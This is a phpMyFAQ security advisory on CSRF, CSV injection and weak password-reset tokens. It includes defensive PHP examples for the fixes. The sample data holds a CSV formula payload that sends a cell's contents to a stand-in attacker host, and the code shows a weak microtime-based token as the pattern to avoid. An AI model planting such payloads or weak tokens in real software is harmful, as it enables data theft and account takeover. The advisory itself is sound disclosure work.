Security Advisory 2018-09-02

Multiple vulnerabilities in phpMyFAQ

Issued on:
2018-09-02
Software:
phpMyFAQ <= 2.9.10
Risk:
Medium
Platforms:
all

The phpMyFAQ Team has learned of several security issues in phpMyFAQ 2.9.10 and earlier: a cross-site request forgery, a CSV injection, and an insecure use of microtime() for generating password-reset tokens.

Description

phpMyFAQ does not implement sufficient checks to prevent CSRF and CSV injection in the reports generated in the admin backend. Exploiting the CSRF and the CSV injection requires administrator privileges. In addition, phpMyFAQ uses microtime() to generate password-reset tokens, which does not provide enough randomness for a security token.
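The three weaknesses above and the corresponding defensive patterns, as an added example in plain PHP that is not phpMyFAQ code: a time-derived reset token beside a CSPRNG-based one, a CSV cell writer that neutralises formula prefixes, and a session-bound CSRF token check. The function names, the session array and the sample report rows are constructed for illustration and do not come from the project.

```php
<?php
// Added example, not phpMyFAQ code. Function names, the $session array and
// the sample rows below are constructed for illustration.
declare(strict_types=1);

// --- 1. Password-reset tokens --------------------------------------------

// Weak pattern: a token derived from microtime() is a function of wall-clock
// time only. Its "entropy" is a few microseconds of jitter around the moment
// the reset was requested, which an attacker who triggers the reset can bound
// and then enumerate offline. Shown only as the pattern to avoid.
function weakResetToken(): string
{
    return md5((string) microtime(true));
}

// Hardened: 32 bytes from the OS CSPRNG. random_bytes() throws instead of
// silently degrading when no secure source is available.
function secureResetToken(): string
{
    return bin2hex(random_bytes(32)); // 64 hex characters, 256 bits of entropy
}

// Store only a digest of the token server-side, so a database leak does not
// hand out usable reset links; compare the digest of the submitted token.
function resetTokenDigestForStorage(string $token): string
{
    return hash('sha256', $token);
}

// --- 2. CSV injection in exported reports -------------------------------

// Spreadsheet applications evaluate cells beginning with = + - @ (and some
// treat a leading tab or CR the same way) as formulas. Prefix such values
// with a single quote so the cell is read as text, then quote the field and
// double embedded quotes as RFC 4180 requires.
function csvSafeCell(string $value): string
{
    if ($value !== '' && in_array($value[0], ['=', '+', '-', '@', "\t", "\r"], true)) {
        $value = "'" . $value;
    }
    return '"' . str_replace('"', '""', $value) . '"';
}

function csvLine(array $row): string
{
    $cells = array_map(function ($v) { return csvSafeCell((string) $v); }, $row);
    return implode(',', $cells) . "\r\n";
}

// --- 3. CSRF protection for state-changing admin actions ----------------

// Issue one unpredictable token per session, embed it in every form that
// triggers a report export or other state change, and compare it in
// constant time so the check does not leak a prefix match through timing.
function csrfToken(array &$session): string
{
    if (!isset($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function csrfTokenIsValid(array $session, ?string $submitted): bool
{
    return isset($session['csrf_token'])
        && is_string($submitted)
        && hash_equals($session['csrf_token'], $submitted);
}

// --- Demonstration on constructed data ----------------------------------

// Constructed sample rows for a report export; the second row carries a
// formula payload of the kind a spreadsheet would otherwise evaluate.
$rows = [
    ['id', 'question', 'author'],
    [1, 'How do I reset my password?', 'alice'],
    [2, '=HYPERLINK("http://attacker.example/?c="&A1;"click")', 'mallory'],
];
foreach ($rows as $row) {
    echo csvLine($row);
}

$session = [];
$token = csrfToken($session);
var_dump(csrfTokenIsValid($session, $token));
var_dump(csrfTokenIsValid($session, 'forged'));
var_dump(csrfTokenIsValid($session, null));

$reset = secureResetToken();
echo $reset, "\n", resetTokenDigestForStorage($reset), "\n";
```

Run it with `php example.php`. The exported CSV shows the payload cell as `"'=HYPERLINK(...)"`, which a spreadsheet displays as literal text rather than following the link; the CSRF check accepts only the session's own token and rejects a forged or missing one; and the reset token is a fresh 256-bit value on every call, with only its SHA-256 digest intended for storage.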

Solution

The phpMyFAQ Team has released the new phpMyFAQ version 2.9.11, which fixes the vulnerabilities. All users of affected phpMyFAQ versions are encouraged to upgrade as soon as possible to this latest version.

Workaround

There's no workaround except installing phpMyFAQ 2.9.11.

References

Thanks

The phpMyFAQ team would like to thank Zeel Chavda for reporting the CSRF and the CSV injection. We want to thank everyone for the responsible disclosure of these vulnerabilities.